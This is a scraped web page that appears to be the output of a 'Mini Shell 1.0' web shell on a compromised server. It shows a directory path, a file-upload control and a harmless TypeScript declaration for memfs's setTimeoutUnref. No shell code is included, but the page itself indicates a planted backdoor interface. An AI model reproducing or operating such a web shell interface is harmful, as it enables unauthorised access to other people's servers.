HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /proc/self/root/usr/share/nodejs/memfs/lib/
Upload File :
Current File : //proc/self/root/usr/share/nodejs/memfs/lib/setTimeoutUnref.d.ts
export declare type TSetTimeout = (callback: (...args: any[]) => void, time?: number, args?: any[]) => any;
/**
 * `setTimeoutUnref` is just like `setTimeout`,
 * only in Node's environment it will "unref" its macro task.
 */
declare function setTimeoutUnref(callback: any, time?: any, args?: any): object;
export default setTimeoutUnref;